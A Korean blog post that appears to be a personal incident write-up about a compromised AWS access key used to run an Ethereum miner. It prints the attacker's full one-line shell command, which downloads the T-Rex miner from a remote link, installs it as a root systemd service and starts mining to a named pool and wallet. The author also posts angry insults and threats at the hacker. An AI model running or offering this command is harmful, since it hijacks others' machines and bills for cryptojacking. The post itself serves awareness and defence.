반응형
Notice
Recent Posts
Recent Comments
Link
«   2025/05   »
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Tags more
Archives
Today
Total
관리 메뉴

테크매니아

AWS 해킹당해서 해커 이더리움 채굴에 300만원 보태준 후기 본문

카테고리 없음

AWS 해킹당해서 해커 이더리움 채굴에 300만원 보태준 후기

SciomageLAB 2024. 10. 20. 16:47
반응형

안쓰던 AWS 계정에서 300만원이 나가서 확인해 보니 AWS 액세스키가 해킹당했다.

환불은 진행 중이고.. 이 죽일놈의 해커새끼가 무슨 짓을 했나 궁금해서 로그를 분석해 봤다.

해킹 당한 계정에 들어가서 history를 찍어보니까 딱 한 줄이 나왔다.

sudo chmod 777 /usr && mkdir /usr/trex && sudo chmod 777 /usr/trex && wget -O /usr/trex/t-rex https://drive.google.com/u/1/uc?id=1bErd_zW1Uf62Ntbl-NiTjq7UGuu3n-zz&export=download && sudo chmod +x /usr/trex/t-rex && sudo bash -c echo [Unit] >> /etc/systemd/system/miner.service && sudo bash -c echo Description=Miner >> /etc/systemd/system/miner.service && sudo bash -c echo After=network.target >> /etc/systemd/system/miner.service && sudo bash -c echo StartLimitIntervalSec=0 >> /etc/systemd/system/miner.service && sudo bash -c echo [Service] >> /etc/systemd/system/miner.service && sudo bash -c echo Type=simple >> /etc/systemd/system/miner.service && sudo bash -c echo Restart=always >> /etc/systemd/system/miner.service && sudo bash -c echo RestartSec=1 >> /etc/systemd/system/miner.service && sudo bash -c echo User=root >> /etc/systemd/system/miner.service && sudo bash -c echo ExecStart=/usr/trex/./t-rex -a ethash -o stratum+tcp://eu1.ethermine.org:4444 -u 0x9B152256e13133D87B47eA47Ae512dCD6CBAD12c -p x -w rig11 -i 25 >> /etc/systemd/system/miner.service && sudo bash -c echo [Install] >> /etc/systemd/system/miner.service && sudo bash -c echo WantedBy=multi-user.target >> /etc/systemd/system/miner.service && sudo systemctl enable miner && sudo systemctl start miner

엄청 긴 한 줄 짜리 쉘 스크립트(?)인데. 내용을 보면
구글 드라이브에서 trex라는 채굴용 프로그램(마이너)를 다운받고 마이너 서비스를 만들고 돌렸다.

이 찢어 죽일 새끼의 이더리움 주소는 �x9B152256e13133D87B47eA47Ae512dCD6CBAD12c 이다.

가상화폐라 누군지 찾을 수도 없다. 은행 계좌라면 신고해서 막을텐데.

ethermine.org이라는 마이닝 풀을 통해서 마이닝을 했다.

마이너 이름은 rig11, 한 두 개가 아닌가 보다.


마이닝 풀에서 검색을 해보면 꾸준히 마이닝을 하고 있고 큰 규모로 마이닝을 하고 있다.

중간에 끊긴 건 아마 해킹한 마이너가 정지돼서 그런 것 같다. 꼬시다.


마이너가 엄청 많고.. 이중에는 아주 큰 규모의 마이너도 있다.


아마 불법 마이닝으로 50만달러.. 5억 정도를 적립해 놨다. 진짜 처 죽일 새끼다.

이 쌔끼.. 걸리면 진짜 죽여놓을거다...

SSH 접속 기록을 보면, AWS 인스턴스가 만들어지고 접속된 기록 하나.

한참 후에 침해 사고 발생 후 AWS 스냅샷을 만들고 복구된 후에 들어간 접속기록이 여러개 있다.

맨 처음 인스턴스를 만들고 접속 한 게 해커의 기록일 것이다.

2021-10-12 12:15:09에 194.247.178.8 IP로 AWS 인스턴스에 접속했고
맨위에 있는 엄청 긴 한 줄 짜리 trex 코드를 실행 시켰다.

IP주소는 우크라니아로 나오고.. 특별한 정보도 없고 단서도 없다...

그리고 사고를 알게 돼서 2021-11-07에 서버를 종료했다.

아무튼... AWS 계정 보안 관리와 사용량 설정을 꼭 하고 잘 관리해야 한다..

반응형